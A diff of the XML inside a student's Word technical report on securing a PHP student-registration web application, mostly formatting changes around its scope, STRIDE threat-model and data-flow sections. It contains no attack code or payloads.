--- a/ift542_student_registration 2021-1-83286CF/IFT542_Technical_Report 2021-1-83286CF.docx
+++ b/ift542_student_registration 2021-1-83286CF/IFT542_Technical_Report 2021-1-83286CF.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpsCustomData="http://www.wps.cn/officeDocument/2013/wpsCustomData" mc:Ignorable="w14 w15 wp14">
   <w:body>
     <w:p>
       <w:pPr>
@@ -182,7 +182,29 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>2021/1/84174CF</w:t>
+        <w:t>2021/1/8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>3286</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>CF</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -194,7 +216,7 @@
     <w:p/>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="2"/>
         <w:spacing w:before="320" w:after="160"/>
       </w:pPr>
       <w:r>
@@ -338,11 +360,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="2"/>
         <w:spacing w:before="320" w:after="160"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>1. Introduction and Scope</w:t>
       </w:r>
     </w:p>
@@ -378,219 +399,41 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> STRIDE</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>based threat model of the application's data flows</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>I</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>dentification and remediation of an authentication weakness and a SQL injection vulnerability, and</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>I</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>mplementation of broader web application defences covering cross</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>site scripting (XSS), cross</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">site request forgery (CSRF), </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>server</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>side</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> request forgery (SSRF), broken access control, security misconfiguration and security event logging.</w:t>
+        <w:t>1. A STRIDE based threat model of the application's data flows</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>2. Identification and remediation of an authentication weakness and a SQL injection vulnerability, and</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>3. Implementation of broader web application defences covering cross site scripting (XSS), cross site request forgery (CSRF), server side request forgery (SSRF), broken access control, security misconfiguration and security event logging.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -604,39 +447,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>The application supports student self</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>registration, login, profile editing, course enrolment, document upload, and an administrator area for managing students and courses. It was built from scratch for this assignment (no lecturer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>provided starter application was available) using vanilla PHP with PDO for MySQL access, so that every security control described here is visible in application code rather than hidden inside a framework.</w:t>
+        <w:t>The application supports student self registration, login, profile editing, course enrolment, document upload, and an administrator area for managing students and courses. It was built from scratch for this assignment (no lecturer provided starter application was available) using vanilla PHP with PDO for MySQL access, so that every security control described here is visible in application code rather than hidden inside a framework.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -654,7 +465,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
       </w:pPr>
       <w:r>
@@ -663,10 +474,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -681,10 +492,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -699,10 +510,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -717,10 +528,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -735,10 +546,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -753,10 +564,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
         <w:spacing w:after="80"/>
       </w:pPr>
@@ -776,11 +587,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="2"/>
         <w:spacing w:before="320" w:after="160"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>2. System Overview and Data Flow Diagram</w:t>
       </w:r>
     </w:p>
@@ -816,11 +626,8 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67E1B411" wp14:editId="74A98CF3">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5905500" cy="4276725"/>
             <wp:effectExtent l="0" t="0" r="0" b="9525"/>
             <wp:docPr id="1" name="Picture 1"/>
@@ -831,19 +638,19 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPr id="1" name="Picture 1"/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
+                    <a:blip r:embed="rId6"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
                   </pic:blipFill>
-                  <pic:spPr bwMode="auto">
+                  <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
                       <a:ext cx="5905500" cy="4276725"/>
@@ -887,17 +694,16 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="2"/>
         <w:spacing w:before="320" w:after="160"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>3. STRIDE Threat Model</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="3"/>
       </w:pPr>
       <w:r>
         <w:t>3.1 Assets</w:t>
@@ -905,10 +711,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -922,10 +728,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -939,10 +745,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -956,10 +762,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -973,10 +779,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -990,7 +796,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240"/>
       </w:pPr>
       <w:r>
@@ -999,10 +805,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -1016,10 +822,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -1033,10 +839,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:pStyle w:val="19"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
+          <w:numId w:val="1"/>
         </w:numPr>
       </w:pPr>
       <w:r>
@@ -1045,46 +851,12 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Application server ↔ External verification site (flow 13) — the only </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>third</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>party</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> egress, and the focus of the SSRF analysis</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:t>Application server ↔ External verification site (flow 13) — the only third party egress, and the focus of the SSRF analysis</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
       </w:pPr>
       <w:r>
@@ -1093,20 +865,24 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
+        <w:tblStyle w:val="9"/>
         <w:tblW w:w="10060" w:type="dxa"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
         <w:tblBorders>
-          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
         </w:tblBorders>
+        <w:tblLayout w:type="autofit"/>
         <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
           <w:left w:w="10" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
           <w:right w:w="10" w:type="dxa"/>
         </w:tblCellMar>
-        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
       </w:tblPr>
       <w:tblGrid>
         <w:gridCol w:w="800"/>
@@ -1115,8 +891,24 @@
         <w:gridCol w:w="4060"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:trPr>
-          <w:trHeight w:val="275"/>
+          <w:trHeight w:val="275" w:hRule="atLeast"/>
           <w:tblHeader/>
         </w:trPr>
         <w:tc>
@@ -1209,6 +1001,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="800" w:type="dxa"/>
@@ -1279,6 +1087,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="800" w:type="dxa"/>
@@ -1349,6 +1173,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="800" w:type="dxa"/>
@@ -1406,50 +1246,35 @@
             <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>password_</w:t>
-            </w:r>
